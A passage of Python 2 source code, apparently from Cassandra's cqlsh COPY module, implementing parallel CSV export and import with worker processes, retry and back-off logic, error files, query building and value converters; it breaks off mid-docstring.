def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, ranges.keys())
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed; retry up to max_attempts if no rows have been
# received yet. If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data even if we got
# an error with no rows received yet; it's just less likely. On the other hand,
# never retrying on timeouts would risk not exporting some rows at all.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source yielded is an open file object
for one of the files matched by the comma-separated list of glob
expressions, or None if the file could not be opened.
"""
def make_source(fname):
try:
return open(fname, 'rb')
except IOError, e:
printdebugmsg("Can't open %r for reading: %s" % (fname, e))
return None
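        # For example (illustrative only), paths might be "data/part1.csv,exports/2016-*.csv":
        # the first entry is used as-is and the second one is expanded with glob.glob().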
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
for f in glob.glob(path):
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = self.sources.next()
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
self.current_source.next()
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
try:
row = self.current_source.next()
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return filter(None, rows)
class PipeReader(object):
"""
    A class for reading rows received on a pipe; this is used for reading input from STDIN.
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
        We treat read and parse errors as unrecoverable, and we keep separate global counters for giving up
        when a maximum has been reached. We consider value and type errors as parse errors as well, since
        they are typically non-recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.insert_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
columns = u"[" + u", ".join(self.valid_columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options,
self.shell.conn if not IS_WINDOWS else None)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
shell.printerr(unicode(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
        directly (in the case of a file, the child process would close it). This is very primitive support
        for STDIN import in that we won't start reporting progress until STDIN is fully consumed. I
        think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print
def import_records(self):
"""
        Keep running while there is data to receive or send and while all processes are running.
        Send data (batches or retries) up to the max ingest rate, and check the incoming queue
        while waiting for data to receive.
"""
if not self.fname:
self.send_stdin_rows()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records(),
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
        Receive results from the worker processes, which send the number of rows imported, or from the
        feeder process, which sends the total number of rows sent once it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options, parent_cluster):
mp.Process.__init__(self, target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.chunk_id = 0
self.parent_cluster = parent_cluster
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
reader.start()
channels = self.worker_channels
sent = 0
while not reader.exhausted:
for ch in channels:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception, exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
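        # Chunks are plain dicts; each worker updates 'imported' on its copy of the chunk as
        # batches complete and replies with an ImportProcessResult once it reaches 'num_rows_sent'.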
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
    A child worker process; this holds the functionality common to ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
mp.Process.__init__(self, target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.parent_cluster = params['parent_cluster']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
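        # For example (illustrative only), the variable might hold JSON such as
        # '{"failing_range": {"start": 0, "end": 5000, "num_failures": 3}}'; see
        # maybe_inject_failures() in the subclasses for the keys that are actually read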
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
randrange() excludes the last value, so we drop the -1.
        :return: the number of seconds to wait, or -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
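        # For example (illustrative only): retry_num=0 picks a delay in [0, 1] seconds,
        # retry_num=1 in [0, 3], retry_num=2 in [0, 7], and so on, up to max_attempts.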
delay = randrange(0, pow(2, retry_num + 1))
return delay
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
    A child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['float_precision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
try:
self.inner_run()
finally:
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = unicode(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in self.hosts_to_sessions.values())
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
        smallest number of requests. If we fail to connect to all replicas, we report an error so that the
        token range will be retried later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception, e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
        if host in self.hosts_to_sessions:
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows)
else:
self.write_rows_to_csv(token_range, rows)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows):
if not rows:
return # no rows in this range
try:
output = StringIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(map(self.format_value, row))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception, e:
self.report_error(e, token_range)
def format_value(self, val):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
ctype = type(val)
formatter = self.formatters.get(ctype, None)
if not formatter:
formatter = get_formatter(ctype)
self.formatters[ctype] = formatter
return formatter(val, encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=self.float_precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
def close(self):
ChildProcess.close(self)
for session in self.hosts_to_sessions.values():
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
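        # For example (illustrative only), for token_range (100, 200) with partition key pk and
        # columns col1, col2 this builds:
        #   SELECT col1, col2 FROM ks.t WHERE token(pk) > 100 AND token(pk) <= 200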
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
        route the update query to the correct replicas. As far as I understand, this is the easiest
        way to find out the types of the partition columns; we never actually execute this prepared statement.
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(select_query)
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
        Return a function that converts a string into a value that can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
if v == self.nullval:
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
return bytearray.fromhex(v[2:])
def convert_text(v, **_):
return v
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == self.boolean_styles[0].lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slow and a fast integer conversion function depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slow and a fast decimal conversion function depending on self.thousands_sep and self.decimal_sep
"""
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, '').replace(self.decimal_sep, '.'))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, '.'))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
            Split into a list of values whenever we encounter a separator, but ignore
            separators inside parentheses, brackets, braces or single quotes; the two
            outermost enclosing characters are stripped and not included in the result.
            We expect val to be at least 2 characters long (the two outer enclosing
            characters).
"""
ret = []
last = 1
level = 0
quote = False
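            # For example (illustrative only): split("[1,2,'a,b']") returns ["1", "2", "'a,b'"];
            # the outer brackets are stripped and the comma inside the quoted string is ignored.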
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if c == '{' or c == '[' or c == '(':
level += 1
elif c == '}' or c == ']' or c == ')':
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL datetime formats
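        # (for example, illustrative only, it accepts values such as '2017-01-31',
        # '2017-01-31 14:30:59' and '2017-01-31 14:30:59+01:00')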
p = re.compile("(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" + # YYYY-MM-DD[( |'T')]
"(?:(\d{2}):(\d{2})(?::(\d{2}))?)?" + # [HH:MM[:SS]]
"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
raise ValueError("can't interpret %r as a date with this format: %s" % (val, self.date_time_format))
# https://docs.python.org/2/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
if m.group(7):
offset = (int(m.group(8)) * 3600 + int(m.group(9)) * 60) * int(m.group(7) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return (timegm(tval) + offset) * 1e3
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
            We need to pass a dict() to BoundStatement.bind() because it calls iteritems(), but we
            can't create a dict with another dict as the key. Hence we use a class that adds
            iteritems() to a frozenset of tuples (which is how dicts are normally made immutable
            in Python).
"""
class ImmutableDict(frozenset):
iteritems = frozenset.__iter__
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split('{%s}' % vv, sep=':') for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
